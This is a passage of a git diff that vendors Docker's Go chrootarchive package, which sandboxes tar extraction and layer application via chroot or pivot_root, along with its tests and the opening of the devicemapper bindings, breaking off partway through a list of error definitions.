writer.Clean() +} + +type devNullCloser int + +func (d devNullCloser) Close() error { + return nil +} + +func (d devNullCloser) Write(buf []byte) (int, error) { + return len(buf), nil +} + +// This test checks for races. It is only useful when run with the race detector. +func TestRaceUnbuffered(t *testing.T) { + writer := new(Unbuffered) + c := make(chan bool) + go func() { + writer.Add(devNullCloser(0)) + c <- true + }() + writer.Write([]byte("hello")) + <-c +} + +func BenchmarkUnbuffered(b *testing.B) { + writer := new(Unbuffered) + setUpWriter := func() { + for i := 0; i < 100; i++ { + writer.Add(devNullCloser(0)) + writer.Add(devNullCloser(0)) + writer.Add(devNullCloser(0)) + } + } + testLine := "Line that thinks that it is log line from docker" + var buf bytes.Buffer + for i := 0; i < 100; i++ { + buf.Write([]byte(testLine + "\n")) + } + // line without eol + buf.Write([]byte(testLine)) + testText := buf.Bytes() + b.SetBytes(int64(5 * len(testText))) + b.ResetTimer() + for i := 0; i < b.N; i++ { + b.StopTimer() + setUpWriter() + b.StartTimer() + + for j := 0; j < 5; j++ { + if _, err := writer.Write(testText); err != nil { + b.Fatal(err) + } + } + + b.StopTimer() + writer.Clean() + b.StartTimer() + } +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go new file mode 100644 index 0000000000..a7814f5b90 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go @@ -0,0 +1,97 @@ +package chrootarchive + +import ( + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" +) + +var chrootArchiver = &archive.Archiver{Untar: Untar} + +// Untar reads a stream of bytes from `archive`, parses it as a tar archive, +// and unpacks it into the directory at `dest`. +// The archive may be compressed with one of the following algorithms: +// identity (uncompressed), gzip, bzip2, xz. +func Untar(tarArchive io.Reader, dest string, options *archive.TarOptions) error { + return untarHandler(tarArchive, dest, options, true) +} + +// UntarUncompressed reads a stream of bytes from `archive`, parses it as a tar archive, +// and unpacks it into the directory at `dest`. +// The archive must be an uncompressed stream. +func UntarUncompressed(tarArchive io.Reader, dest string, options *archive.TarOptions) error { + return untarHandler(tarArchive, dest, options, false) +} + +// Handler for teasing out the automatic decompression +func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions, decompress bool) error { + + if tarArchive == nil { + return fmt.Errorf("Empty archive") + } + if options == nil { + options = &archive.TarOptions{} + } + if options.ExcludePatterns == nil { + options.ExcludePatterns = []string{} + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) + if err != nil { + return err + } + + dest = filepath.Clean(dest) + if _, err := os.Stat(dest); os.IsNotExist(err) { + if err := idtools.MkdirAllNewAs(dest, 0755, rootUID, rootGID); err != nil { + return err + } + } + + r := ioutil.NopCloser(tarArchive) + if decompress { + decompressedArchive, err := archive.DecompressStream(tarArchive) + if err != nil { + return err + } + defer decompressedArchive.Close() + r = decompressedArchive + } + + return invokeUnpack(r, dest, options) +} + +// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. +// If either Tar or Untar fails, TarUntar aborts and returns the error. +func TarUntar(src, dst string) error { + return chrootArchiver.TarUntar(src, dst) +} + +// CopyWithTar creates a tar archive of filesystem path `src`, and +// unpacks it at filesystem path `dst`. +// The archive is streamed directly with fixed buffering and no +// intermediary disk IO. +func CopyWithTar(src, dst string) error { + return chrootArchiver.CopyWithTar(src, dst) +} + +// CopyFileWithTar emulates the behavior of the 'cp' command-line +// for a single file. It copies a regular file from path `src` to +// path `dst`, and preserves all its metadata. +// +// If `dst` ends with a trailing slash '/' ('\' on Windows), the final +// destination path will be `dst/base(src)` or `dst\base(src)` +func CopyFileWithTar(src, dst string) (err error) { + return chrootArchiver.CopyFileWithTar(src, dst) +} + +// UntarPath is a convenience function which looks for an archive +// at filesystem path `src`, and unpacks it at `dst`. +func UntarPath(src, dst string) error { + return chrootArchiver.UntarPath(src, dst) +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go new file mode 100644 index 0000000000..d2d7e621f5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go @@ -0,0 +1,394 @@ +package chrootarchive + +import ( + "bytes" + "fmt" + "hash/crc32" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strings" + "testing" + "time" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/system" +) + +func init() { + reexec.Init() +} + +func TestChrootTarUntar(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntar") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(src, "lolo"), []byte("hello lolo"), 0644); err != nil { + t.Fatal(err) + } + stream, err := archive.Tar(src, archive.Uncompressed) + if err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + if err := Untar(stream, dest, &archive.TarOptions{ExcludePatterns: []string{"lolo"}}); err != nil { + t.Fatal(err) + } +} + +// gh#10426: Verify the fix for having a huge excludes list (like on `docker load` with large # of +// local images) +func TestChrootUntarWithHugeExcludesList(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarHugeExcludes") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil { + t.Fatal(err) + } + stream, err := archive.Tar(src, archive.Uncompressed) + if err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "dest") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + options := &archive.TarOptions{} + //65534 entries of 64-byte strings ~= 4MB of environment space which should overflow + //on most systems when passed via environment or command line arguments + excludes := make([]string, 65534, 65534) + for i := 0; i < 65534; i++ { + excludes[i] = strings.Repeat(string(i), 64) + } + options.ExcludePatterns = excludes + if err := Untar(stream, dest, options); err != nil { + t.Fatal(err) + } +} + +func TestChrootUntarEmptyArchive(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarEmptyArchive") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := Untar(nil, tmpdir, nil); err == nil { + t.Fatal("expected error on empty archive") + } +} + +func prepareSourceDirectory(numberOfFiles int, targetPath string, makeSymLinks bool) (int, error) { + fileData := []byte("fooo") + for n := 0; n < numberOfFiles; n++ { + fileName := fmt.Sprintf("file-%d", n) + if err := ioutil.WriteFile(filepath.Join(targetPath, fileName), fileData, 0700); err != nil { + return 0, err + } + if makeSymLinks { + if err := os.Symlink(filepath.Join(targetPath, fileName), filepath.Join(targetPath, fileName+"-link")); err != nil { + return 0, err + } + } + } + totalSize := numberOfFiles * len(fileData) + return totalSize, nil +} + +func getHash(filename string) (uint32, error) { + stream, err := ioutil.ReadFile(filename) + if err != nil { + return 0, err + } + hash := crc32.NewIEEE() + hash.Write(stream) + return hash.Sum32(), nil +} + +func compareDirectories(src string, dest string) error { + changes, err := archive.ChangesDirs(dest, src) + if err != nil { + return err + } + if len(changes) > 0 { + return fmt.Errorf("Unexpected differences after untar: %v", changes) + } + return nil +} + +func compareFiles(src string, dest string) error { + srcHash, err := getHash(src) + if err != nil { + return err + } + destHash, err := getHash(dest) + if err != nil { + return err + } + if srcHash != destHash { + return fmt.Errorf("%s is different from %s", src, dest) + } + return nil +} + +func TestChrootTarUntarWithSymlink(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntarWithSymlink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if _, err := prepareSourceDirectory(10, src, false); err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "dest") + if err := TarUntar(src, dest); err != nil { + t.Fatal(err) + } + if err := compareDirectories(src, dest); err != nil { + t.Fatal(err) + } +} + +func TestChrootCopyWithTar(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip("Failing on Windows and Solaris") + } + tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyWithTar") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if _, err := prepareSourceDirectory(10, src, true); err != nil { + t.Fatal(err) + } + + // Copy directory + dest := filepath.Join(tmpdir, "dest") + if err := CopyWithTar(src, dest); err != nil { + t.Fatal(err) + } + if err := compareDirectories(src, dest); err != nil { + t.Fatal(err) + } + + // Copy file + srcfile := filepath.Join(src, "file-1") + dest = filepath.Join(tmpdir, "destFile") + destfile := filepath.Join(dest, "file-1") + if err := CopyWithTar(srcfile, destfile); err != nil { + t.Fatal(err) + } + if err := compareFiles(srcfile, destfile); err != nil { + t.Fatal(err) + } + + // Copy symbolic link + srcLinkfile := filepath.Join(src, "file-1-link") + dest = filepath.Join(tmpdir, "destSymlink") + destLinkfile := filepath.Join(dest, "file-1-link") + if err := CopyWithTar(srcLinkfile, destLinkfile); err != nil { + t.Fatal(err) + } + if err := compareFiles(srcLinkfile, destLinkfile); err != nil { + t.Fatal(err) + } +} + +func TestChrootCopyFileWithTar(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyFileWithTar") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if _, err := prepareSourceDirectory(10, src, true); err != nil { + t.Fatal(err) + } + + // Copy directory + dest := filepath.Join(tmpdir, "dest") + if err := CopyFileWithTar(src, dest); err == nil { + t.Fatal("Expected error on copying directory") + } + + // Copy file + srcfile := filepath.Join(src, "file-1") + dest = filepath.Join(tmpdir, "destFile") + destfile := filepath.Join(dest, "file-1") + if err := CopyFileWithTar(srcfile, destfile); err != nil { + t.Fatal(err) + } + if err := compareFiles(srcfile, destfile); err != nil { + t.Fatal(err) + } + + // Copy symbolic link + srcLinkfile := filepath.Join(src, "file-1-link") + dest = filepath.Join(tmpdir, "destSymlink") + destLinkfile := filepath.Join(dest, "file-1-link") + if err := CopyFileWithTar(srcLinkfile, destLinkfile); err != nil { + t.Fatal(err) + } + if err := compareFiles(srcLinkfile, destLinkfile); err != nil { + t.Fatal(err) + } +} + +func TestChrootUntarPath(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarPath") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if _, err := prepareSourceDirectory(10, src, false); err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "dest") + // Untar a directory + if err := UntarPath(src, dest); err == nil { + t.Fatal("Expected error on untaring a directory") + } + + // Untar a tar file + stream, err := archive.Tar(src, archive.Uncompressed) + if err != nil { + t.Fatal(err) + } + buf := new(bytes.Buffer) + buf.ReadFrom(stream) + tarfile := filepath.Join(tmpdir, "src.tar") + if err := ioutil.WriteFile(tarfile, buf.Bytes(), 0644); err != nil { + t.Fatal(err) + } + if err := UntarPath(tarfile, dest); err != nil { + t.Fatal(err) + } + if err := compareDirectories(src, dest); err != nil { + t.Fatal(err) + } +} + +type slowEmptyTarReader struct { + size int + offset int + chunkSize int +} + +// Read is a slow reader of an empty tar (like the output of "tar c --files-from /dev/null") +func (s *slowEmptyTarReader) Read(p []byte) (int, error) { + time.Sleep(100 * time.Millisecond) + count := s.chunkSize + if len(p) < s.chunkSize { + count = len(p) + } + for i := 0; i < count; i++ { + p[i] = 0 + } + s.offset += count + if s.offset > s.size { + return count, io.EOF + } + return count, nil +} + +func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarEmptyArchiveFromSlowReader") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + dest := filepath.Join(tmpdir, "dest") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024} + if err := Untar(stream, dest, nil); err != nil { + t.Fatal(err) + } +} + +func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyEmptyArchiveFromSlowReader") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + dest := filepath.Join(tmpdir, "dest") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024} + if _, err := ApplyLayer(dest, stream); err != nil { + t.Fatal(err) + } +} + +func TestChrootApplyDotDotFile(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyDotDotFile") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(src, "..gitme"), []byte(""), 0644); err != nil { + t.Fatal(err) + } + stream, err := archive.Tar(src, archive.Uncompressed) + if err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "dest") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + if _, err := ApplyLayer(dest, stream); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go new file mode 100644 index 0000000000..f2325abd74 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go @@ -0,0 +1,86 @@ +// +build !windows + +package chrootarchive + +import ( + "bytes" + "encoding/json" + "flag" + "fmt" + "io" + "io/ioutil" + "os" + "runtime" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" +) + +// untar is the entry-point for docker-untar on re-exec. This is not used on +// Windows as it does not support chroot, hence no point sandboxing through +// chroot and rexec. +func untar() { + runtime.LockOSThread() + flag.Parse() + + var options *archive.TarOptions + + //read the options from the pipe "ExtraFiles" + if err := json.NewDecoder(os.NewFile(3, "options")).Decode(&options); err != nil { + fatal(err) + } + + if err := chroot(flag.Arg(0)); err != nil { + fatal(err) + } + + if err := archive.Unpack(os.Stdin, "/", options); err != nil { + fatal(err) + } + // fully consume stdin in case it is zero padded + if _, err := flush(os.Stdin); err != nil { + fatal(err) + } + + os.Exit(0) +} + +func invokeUnpack(decompressedArchive io.Reader, dest string, options *archive.TarOptions) error { + + // We can't pass a potentially large exclude list directly via cmd line + // because we easily overrun the kernel's max argument/environment size + // when the full image list is passed (e.g. when this is used by + // `docker load`). We will marshall the options via a pipe to the + // child + r, w, err := os.Pipe() + if err != nil { + return fmt.Errorf("Untar pipe failure: %v", err) + } + + cmd := reexec.Command("docker-untar", dest) + cmd.Stdin = decompressedArchive + + cmd.ExtraFiles = append(cmd.ExtraFiles, r) + output := bytes.NewBuffer(nil) + cmd.Stdout = output + cmd.Stderr = output + + if err := cmd.Start(); err != nil { + return fmt.Errorf("Untar error on re-exec cmd: %v", err) + } + //write the options to the pipe for the untar exec to read + if err := json.NewEncoder(w).Encode(options); err != nil { + return fmt.Errorf("Untar json encode to pipe failed: %v", err) + } + w.Close() + + if err := cmd.Wait(); err != nil { + // when `xz -d -c -q | docker-untar ...` failed on docker-untar side, + // we need to exhaust `xz`'s output, otherwise the `xz` side will be + // pending on write pipe forever + io.Copy(ioutil.Discard, decompressedArchive) + + return fmt.Errorf("Error processing tar file(%v): %s", err, output) + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go new file mode 100644 index 0000000000..0a500ed5c2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go @@ -0,0 +1,22 @@ +package chrootarchive + +import ( + "io" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/longpath" +) + +// chroot is not supported by Windows +func chroot(path string) error { + return nil +} + +func invokeUnpack(decompressedArchive io.ReadCloser, + dest string, + options *archive.TarOptions) error { + // Windows is different to Linux here because Windows does not support + // chroot. Hence there is no point sandboxing a chrooted process to + // do the unpack. We call inline instead within the daemon process. + return archive.Unpack(decompressedArchive, longpath.AddPrefix(dest), options) +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go new file mode 100644 index 0000000000..f9d7fed633 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go @@ -0,0 +1,108 @@ +package chrootarchive + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "syscall" + + "github.com/docker/docker/pkg/mount" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +// chroot on linux uses pivot_root instead of chroot +// pivot_root takes a new root and an old root. +// Old root must be a sub-dir of new root, it is where the current rootfs will reside after the call to pivot_root. +// New root is where the new rootfs is set to. +// Old root is removed after the call to pivot_root so it is no longer available under the new root. +// This is similar to how libcontainer sets up a container's rootfs +func chroot(path string) (err error) { + // if the engine is running in a user namespace we need to use actual chroot + if rsystem.RunningInUserNS() { + return realChroot(path) + } + if err := syscall.Unshare(syscall.CLONE_NEWNS); err != nil { + return fmt.Errorf("Error creating mount namespace before pivot: %v", err) + } + + // make everything in new ns private + if err := mount.MakeRPrivate("/"); err != nil { + return err + } + + if mounted, _ := mount.Mounted(path); !mounted { + if err := mount.Mount(path, path, "bind", "rbind,rw"); err != nil { + return realChroot(path) + } + } + + // setup oldRoot for pivot_root + pivotDir, err := ioutil.TempDir(path, ".pivot_root") + if err != nil { + return fmt.Errorf("Error setting up pivot dir: %v", err) + } + + var mounted bool + defer func() { + if mounted { + // make sure pivotDir is not mounted before we try to remove it + if errCleanup := syscall.Unmount(pivotDir, syscall.MNT_DETACH); errCleanup != nil { + if err == nil { + err = errCleanup + } + return + } + } + + errCleanup := os.Remove(pivotDir) + // pivotDir doesn't exist if pivot_root failed and chroot+chdir was successful + // because we already cleaned it up on failed pivot_root + if errCleanup != nil && !os.IsNotExist(errCleanup) { + errCleanup = fmt.Errorf("Error cleaning up after pivot: %v", errCleanup) + if err == nil { + err = errCleanup + } + } + }() + + if err := syscall.PivotRoot(path, pivotDir); err != nil { + // If pivot fails, fall back to the normal chroot after cleaning up temp dir + if err := os.Remove(pivotDir); err != nil { + return fmt.Errorf("Error cleaning up after failed pivot: %v", err) + } + return realChroot(path) + } + mounted = true + + // This is the new path for where the old root (prior to the pivot) has been moved to + // This dir contains the rootfs of the caller, which we need to remove so it is not visible during extraction + pivotDir = filepath.Join("/", filepath.Base(pivotDir)) + + if err := syscall.Chdir("/"); err != nil { + return fmt.Errorf("Error changing to new root: %v", err) + } + + // Make the pivotDir (where the old root lives) private so it can be unmounted without propagating to the host + if err := syscall.Mount("", pivotDir, "", syscall.MS_PRIVATE|syscall.MS_REC, ""); err != nil { + return fmt.Errorf("Error making old root private after pivot: %v", err) + } + + // Now unmount the old root so it's no longer visible from the new root + if err := syscall.Unmount(pivotDir, syscall.MNT_DETACH); err != nil { + return fmt.Errorf("Error while unmounting old root after pivot: %v", err) + } + mounted = false + + return nil +} + +func realChroot(path string) error { + if err := syscall.Chroot(path); err != nil { + return fmt.Errorf("Error after fallback to chroot: %v", err) + } + if err := syscall.Chdir("/"); err != nil { + return fmt.Errorf("Error changing to new root after chroot: %v", err) + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go new file mode 100644 index 0000000000..16354bf648 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go @@ -0,0 +1,12 @@ +// +build !windows,!linux + +package chrootarchive + +import "syscall" + +func chroot(path string) error { + if err := syscall.Chroot(path); err != nil { + return err + } + return syscall.Chdir("/") +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go new file mode 100644 index 0000000000..49acad79ff --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go @@ -0,0 +1,23 @@ +package chrootarchive + +import ( + "io" + + "github.com/docker/docker/pkg/archive" +) + +// ApplyLayer parses a diff in the standard layer format from `layer`, +// and applies it to the directory `dest`. The stream `layer` can only be +// uncompressed. +// Returns the size in bytes of the contents of the layer. +func ApplyLayer(dest string, layer io.Reader) (size int64, err error) { + return applyLayerHandler(dest, layer, &archive.TarOptions{}, true) +} + +// ApplyUncompressedLayer parses a diff in the standard layer format from +// `layer`, and applies it to the directory `dest`. The stream `layer` +// can only be uncompressed. +// Returns the size in bytes of the contents of the layer. +func ApplyUncompressedLayer(dest string, layer io.Reader, options *archive.TarOptions) (int64, error) { + return applyLayerHandler(dest, layer, options, false) +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go new file mode 100644 index 0000000000..eb0aacc3ab --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go @@ -0,0 +1,130 @@ +//+build !windows + +package chrootarchive + +import ( + "bytes" + "encoding/json" + "flag" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/system" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +type applyLayerResponse struct { + LayerSize int64 `json:"layerSize"` +} + +// applyLayer is the entry-point for docker-applylayer on re-exec. This is not +// used on Windows as it does not support chroot, hence no point sandboxing +// through chroot and rexec. +func applyLayer() { + + var ( + tmpDir = "" + err error + options *archive.TarOptions + ) + runtime.LockOSThread() + flag.Parse() + + inUserns := rsystem.RunningInUserNS() + if err := chroot(flag.Arg(0)); err != nil { + fatal(err) + } + + // We need to be able to set any perms + oldmask, err := system.Umask(0) + defer system.Umask(oldmask) + if err != nil { + fatal(err) + } + + if err := json.Unmarshal([]byte(os.Getenv("OPT")), &options); err != nil { + fatal(err) + } + + if inUserns { + options.InUserNS = true + } + + if tmpDir, err = ioutil.TempDir("/", "temp-docker-extract"); err != nil { + fatal(err) + } + + os.Setenv("TMPDIR", tmpDir) + size, err := archive.UnpackLayer("/", os.Stdin, options) + os.RemoveAll(tmpDir) + if err != nil { + fatal(err) + } + + encoder := json.NewEncoder(os.Stdout) + if err := encoder.Encode(applyLayerResponse{size}); err != nil { + fatal(fmt.Errorf("unable to encode layerSize JSON: %s", err)) + } + + if _, err := flush(os.Stdin); err != nil { + fatal(err) + } + + os.Exit(0) +} + +// applyLayerHandler parses a diff in the standard layer format from `layer`, and +// applies it to the directory `dest`. Returns the size in bytes of the +// contents of the layer. +func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions, decompress bool) (size int64, err error) { + dest = filepath.Clean(dest) + if decompress { + decompressed, err := archive.DecompressStream(layer) + if err != nil { + return 0, err + } + defer decompressed.Close() + + layer = decompressed + } + if options == nil { + options = &archive.TarOptions{} + if rsystem.RunningInUserNS() { + options.InUserNS = true + } + } + if options.ExcludePatterns == nil { + options.ExcludePatterns = []string{} + } + + data, err := json.Marshal(options) + if err != nil { + return 0, fmt.Errorf("ApplyLayer json encode: %v", err) + } + + cmd := reexec.Command("docker-applyLayer", dest) + cmd.Stdin = layer + cmd.Env = append(cmd.Env, fmt.Sprintf("OPT=%s", data)) + + outBuf, errBuf := new(bytes.Buffer), new(bytes.Buffer) + cmd.Stdout, cmd.Stderr = outBuf, errBuf + + if err = cmd.Run(); err != nil { + return 0, fmt.Errorf("ApplyLayer %s stdout: %s stderr: %s", err, outBuf, errBuf) + } + + // Stdout should be a valid JSON struct representing an applyLayerResponse. + response := applyLayerResponse{} + decoder := json.NewDecoder(outBuf) + if err = decoder.Decode(&response); err != nil { + return 0, fmt.Errorf("unable to decode ApplyLayer JSON response: %s", err) + } + + return response.LayerSize, nil +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go new file mode 100644 index 0000000000..9dd9988de0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go @@ -0,0 +1,45 @@ +package chrootarchive + +import ( + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/longpath" +) + +// applyLayerHandler parses a diff in the standard layer format from `layer`, and +// applies it to the directory `dest`. Returns the size in bytes of the +// contents of the layer. +func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions, decompress bool) (size int64, err error) { + dest = filepath.Clean(dest) + + // Ensure it is a Windows-style volume path + dest = longpath.AddPrefix(dest) + + if decompress { + decompressed, err := archive.DecompressStream(layer) + if err != nil { + return 0, err + } + defer decompressed.Close() + + layer = decompressed + } + + tmpDir, err := ioutil.TempDir(os.Getenv("temp"), "temp-docker-extract") + if err != nil { + return 0, fmt.Errorf("ApplyLayer failed to create temp-docker-extract under %s. %s", dest, err) + } + + s, err := archive.UnpackLayer(dest, layer, nil) + os.RemoveAll(tmpDir) + if err != nil { + return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s", err, dest) + } + + return s, nil +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go new file mode 100644 index 0000000000..4f637f17b8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go @@ -0,0 +1,28 @@ +// +build !windows + +package chrootarchive + +import ( + "fmt" + "io" + "io/ioutil" + "os" + + "github.com/docker/docker/pkg/reexec" +) + +func init() { + reexec.Register("docker-applyLayer", applyLayer) + reexec.Register("docker-untar", untar) +} + +func fatal(err error) { + fmt.Fprint(os.Stderr, err) + os.Exit(1) +} + +// flush consumes all the bytes from the reader discarding +// any errors +func flush(r io.Reader) (bytes int64, err error) { + return io.Copy(ioutil.Discard, r) +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go new file mode 100644 index 0000000000..fa17c9bf83 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go @@ -0,0 +1,4 @@ +package chrootarchive + +func init() { +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go new file mode 100644 index 0000000000..94b55306f1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go @@ -0,0 +1,828 @@ +// +build linux + +package devicemapper + +import ( + "errors" + "fmt" + "os" + "runtime" + "syscall" + "unsafe" + + "github.com/Sirupsen/logrus" +) + +// DevmapperLogger defines methods for logging with devicemapper. +type DevmapperLogger interface { + DMLog(level int, file string, line int, dmError int, message string) +} + +const ( + deviceCreate TaskType = iota + deviceReload + deviceRemove + deviceRemoveAll + deviceSuspend + deviceResume + deviceInfo + deviceDeps + deviceRename + deviceVersion + deviceStatus + deviceTable + deviceWaitevent + deviceList + deviceClear + deviceMknodes + deviceListVersions + deviceTargetMsg + deviceSetGeometry +) + +const ( + addNodeOnResume AddNodeType = iota + addNodeOnCreate +) + +// List of errors returned when using devicemapper. +var ( + ErrTaskRun = errors.New("dm_task_run failed") + ErrTaskSetName = errors.New("dm_task_set_name failed") + ErrTaskSetMessage = errors.New("dm_task_set_message failed") + ErrTaskSetAddNode = errors.New("dm_task_set_add_node failed") + ErrTaskSetRo = errors.New("dm_task_set_ro failed") + ErrTaskAddTarget = errors.New("dm_task_add_target failed") + ErrTaskSetSector = errors.New("dm_task_set_sector failed") + ErrTaskGetDeps = errors.New("dm_task_get_deps failed") + ErrTaskGetInfo = errors.New("dm_task_get_info failed") + ErrTaskGetDriverVersion = errors.New("dm_task_get_driver_version failed") + ErrTaskDeferredRemove = errors.New("dm_task_deferred_remove failed") + ErrTaskSetCookie = errors.New("dm_task_set_cookie failed") + ErrNilCookie = errors.New("cookie ptr can't be nil") + ErrGetBlockSize = errors.New("Can't get block size") + ErrUdevWait = errors.New("wait on udev cookie failed") + ErrSetDevDir = errors.New("dm_set_dev_dir failed") + ErrGetLibraryVersion = errors.New("dm_get_library_version failed") + ErrCreateRemoveTask = errors.New("Can't create task of type deviceRemove") + ErrRunRemoveDevice = errors.New("running RemoveDevice failed") + ErrInvalidAddNode = errors.New("Invalid AddNode type") + ErrBusy = errors.New("Device is Busy") + ErrDeviceIDExists = errors.New("Device Id Exists") + ErrEnxio = errors.New("No 